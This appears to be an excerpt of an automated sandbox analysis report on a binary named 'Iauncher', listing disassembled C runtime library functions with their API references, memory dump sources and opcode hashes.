                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005694B7
                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 005694BF
                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00569548
                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00569573
                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005695C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                    • String ID: csm$SV
                                                                                                                                                    • API String ID: 1170836740-1636546819
                                                                                                                                                    • Opcode ID: 8a6cf238046ec857455d11c8359e1acd5237afb871821c75e4d8f62e076333f0
                                                                                                                                                    • Instruction ID: 88d7df2940f7a51848ecc1040d5940a0c3581bb5f085fb923e00cd5dc141d4b3
                                                                                                                                                    • Opcode Fuzzy Hash: 8a6cf238046ec857455d11c8359e1acd5237afb871821c75e4d8f62e076333f0
                                                                                                                                                    • Instruction Fuzzy Hash: E141A134A002099FCF11DF68C885A9EBFB9BF55328F148155EC19AB352DB31EA15CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00564C6C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 00564C73
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00564C7D
                                                                                                                                                    • int.LIBCPMT ref: 00564C94
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::_Lockit.LIBCPMT ref: 00562588
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::~_Lockit.LIBCPMT ref: 005625A2
                                                                                                                                                    • codecvt.LIBCPMT ref: 00564CB7
                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00564CCE
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00564CEE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 712880209-4155469514
                                                                                                                                                    • Opcode ID: d73743043bda9673c5be8115582c67c76a3c37885dfe8b16038aa5bb427ff236
                                                                                                                                                    • Instruction ID: f5de7a57622beecd8774534e4e9349ab55918ea95e150e327b080cb5ef3ab352
                                                                                                                                                    • Opcode Fuzzy Hash: d73743043bda9673c5be8115582c67c76a3c37885dfe8b16038aa5bb427ff236
                                                                                                                                                    • Instruction Fuzzy Hash: 2911B135900616DBCB10EB64D8596AE7FE5FF94720F200419E802A7391EBB49E44CF81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00580C2A Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCPInfo.KERNEL32(00BF1E18,00BF1E18,?,7FFFFFFF,?,00580EFA,00BF1E18,00BF1E18,?,00BF1E18,?,?,?,?,00BF1E18,?), ref: 00580CD0
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00580D8B
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00580E1A
                                                                                                                                                    • __freea.LIBCMT ref: 00580E65
                                                                                                                                                    • __freea.LIBCMT ref: 00580E6B
                                                                                                                                                    • __freea.LIBCMT ref: 00580EA1
                                                                                                                                                    • __freea.LIBCMT ref: 00580EA7
                                                                                                                                                    • __freea.LIBCMT ref: 00580EB7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 127012223-0
                                                                                                                                                    • Opcode ID: 1a5f9b1b4584ddbc01ae110096770a1607760b62ef0f487310e39b39a78b84b2
                                                                                                                                                    • Instruction ID: 0d316a64c5d062e2c57175b3e17512b64573d73d9a9fd069552c86522265579d
                                                                                                                                                    • Opcode Fuzzy Hash: 1a5f9b1b4584ddbc01ae110096770a1607760b62ef0f487310e39b39a78b84b2
                                                                                                                                                    • Instruction Fuzzy Hash: A671C57290120A9BDF60BEA49C45BAFBFBABF85310F242559EC14B72C2D7759C488790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0056462E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 00564635
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00564640
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005646AE
                                                                                                                                                      • Part of subcall function 00564791: std::locale::_Locimp::_Locimp.LIBCPMT ref: 005647A9
                                                                                                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 0056465B
                                                                                                                                                    • _Yarn.LIBCPMT ref: 00564671
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 1088826258-4155469514
                                                                                                                                                    • Opcode ID: 533e022072aebb81baa7ca8366a3e29fe3c24ae435c748cbcdb6e13267218888
                                                                                                                                                    • Instruction ID: c347bddf2e8a470c86d367e3e16850d171363e35a6a8f193afce6b3507f8d2e9
                                                                                                                                                    • Opcode Fuzzy Hash: 533e022072aebb81baa7ca8366a3e29fe3c24ae435c748cbcdb6e13267218888
                                                                                                                                                    • Instruction Fuzzy Hash: FF015A79A00622DBCB05AF20D85957C7FA5FFE9750B244008EC0267382DF746A86EF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00570EA9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,940D2BD2,?,?,00000000,00582854,000000FF,?,00570E39,?,?,00570E0D,00000000), ref: 00570EDE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00570EF0
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00582854,000000FF,?,00570E39,?,?,00570E0D,00000000), ref: 00570F12
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll$SV
                                                                                                                                                    • API String ID: 4061214504-2182140240
                                                                                                                                                    • Opcode ID: 42ffa21f17e3eff22df792ded141e4a0748dff299a73ff95b4a02eb0dee73068
                                                                                                                                                    • Instruction ID: b82273f55f6e67b481589ac0348030729df884133c3e076940e8885013d8be70
                                                                                                                                                    • Opcode Fuzzy Hash: 42ffa21f17e3eff22df792ded141e4a0748dff299a73ff95b4a02eb0dee73068
                                                                                                                                                    • Instruction Fuzzy Hash: BB018F35A08619EFDB119B50DC09BAEBFB8FB04B14F004529FC11B22D0EB749804DF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0057F56E Relevance: 9.3, APIs: 6, Instructions: 298COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4329cf0b1ec0e0d0fa983510b0dfe9e73dc4597977bcc9c90fd1f57c2844e0f3
                                                                                                                                                    • Instruction ID: 116983671770bfb005c8ebc09254bbc8df90132696700f292671054248ea24f3
                                                                                                                                                    • Opcode Fuzzy Hash: 4329cf0b1ec0e0d0fa983510b0dfe9e73dc4597977bcc9c90fd1f57c2844e0f3
                                                                                                                                                    • Instruction Fuzzy Hash: A9B12874A04246EFDB11DF98E845BAD7FB6BF98304F148169E808AB392C7709D41EF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0056967A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,?,00569671,00569427,00566F4B), ref: 00569688
                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00569696
                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005696AF
                                                                                                                                                    • SetLastError.KERNEL32(00000000,00569671,00569427,00566F4B), ref: 00569701
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                    • Opcode ID: e279f82630b57ababc249e7c5db2317e8a96620b923796b9aab6e26131c8da0a
                                                                                                                                                    • Instruction ID: 442f11d7bbed9650a65acf0c49a35951b9c630a75807f10cf70a32af9bcfba0b
                                                                                                                                                    • Opcode Fuzzy Hash: e279f82630b57ababc249e7c5db2317e8a96620b923796b9aab6e26131c8da0a
                                                                                                                                                    • Instruction Fuzzy Hash: E301D832109312DEB61426B4BC8E65B3E5EFB933707300629F920771E0EFA24C05A742
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00569791 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 1740715915-4155469514
                                                                                                                                                    • Opcode ID: b93075135d757a7346874a6a3c23f06f1d256ce12a7df57e964ab0b88de07730
                                                                                                                                                    • Instruction ID: b9e5e57c9506911c186973b3489b072b3a89d479b41a1cf2449727a42ccfd25c
                                                                                                                                                    • Opcode Fuzzy Hash: b93075135d757a7346874a6a3c23f06f1d256ce12a7df57e964ab0b88de07730
                                                                                                                                                    • Instruction Fuzzy Hash: 2B510472A00202DFEB299F54D845B7ABFACFF96310F14452DE80157295EB32EC41DB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00561603 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 287COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strcspn
                                                                                                                                                    • String ID: LDX$PDX
                                                                                                                                                    • API String ID: 3709121408-807684381
                                                                                                                                                    • Opcode ID: 4818a6c9be67f60fb1a2ffb9ec22c797f347393d3fd8742831c7298b66181d7a
                                                                                                                                                    • Instruction ID: 75ec5dbcf26c819323a07bc63d32ab9c3805d24734d89931d35ff227c33cd848
                                                                                                                                                    • Opcode Fuzzy Hash: 4818a6c9be67f60fb1a2ffb9ec22c797f347393d3fd8742831c7298b66181d7a
                                                                                                                                                    • Instruction Fuzzy Hash: D7B175B5608741AFD720DF24C884A6BBBE9FFC9340F58491DF99987221DB30E905CB56
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0056A7C2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0056A773,00000000,?,?,?,?,?,0056A89D,00000002,FlsGetValue,00585D40,FlsGetValue), ref: 0056A7CF
                                                                                                                                                    • GetLastError.KERNEL32(?,0056A773,00000000,?,?,?,?,?,0056A89D,00000002,FlsGetValue,00585D40,FlsGetValue,00000000,?,0056972D), ref: 0056A7D9
                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000000,?,0056972D,?,?,?,?,?,?), ref: 0056A801
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                    • Opcode ID: c7600847f615e1e5a7386321c0d9c39cf94df6e60dd316b0e7875ac1c6e58ef1
                                                                                                                                                    • Instruction ID: 8e8d8344ae6893387e4f144c4329ae7d7b1ed3333af092225c0b4072c663bd2c
                                                                                                                                                    • Opcode Fuzzy Hash: c7600847f615e1e5a7386321c0d9c39cf94df6e60dd316b0e7875ac1c6e58ef1
                                                                                                                                                    • Instruction Fuzzy Hash: CEE09A31690205F6EA212B61EC0EB5A3F55AB10B51F254020FE0DB91A1E762995AAE85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00577870 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(940D2BD2,00000000,00000000,00000000), ref: 005778D3
                                                                                                                                                      • Part of subcall function 00578FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00576B60,?,00000000,-00000008), ref: 0057905B
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00577B2E
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00577B76
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00577C19
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2112829910-0
                                                                                                                                                    • Opcode ID: 963f6a211c3bc76bbc1714018c0213975e7999cca38e2ccf5661af9442b5b5e1
                                                                                                                                                    • Instruction ID: 00520ba8292c05bc1c383d3b599368b130edaacfdf4cff2cd7b1b43d161425fa
                                                                                                                                                    • Opcode Fuzzy Hash: 963f6a211c3bc76bbc1714018c0213975e7999cca38e2ccf5661af9442b5b5e1
                                                                                                                                                    • Instruction Fuzzy Hash: 85D168B5D042599FCB01CFA8E8849ADBFB9FF4C300F18856AE859EB351E730A945DB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005793CB Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00578FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00576B60,?,00000000,-00000008), ref: 0057905B
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0057942F
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00579436
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00579470
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00579477
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
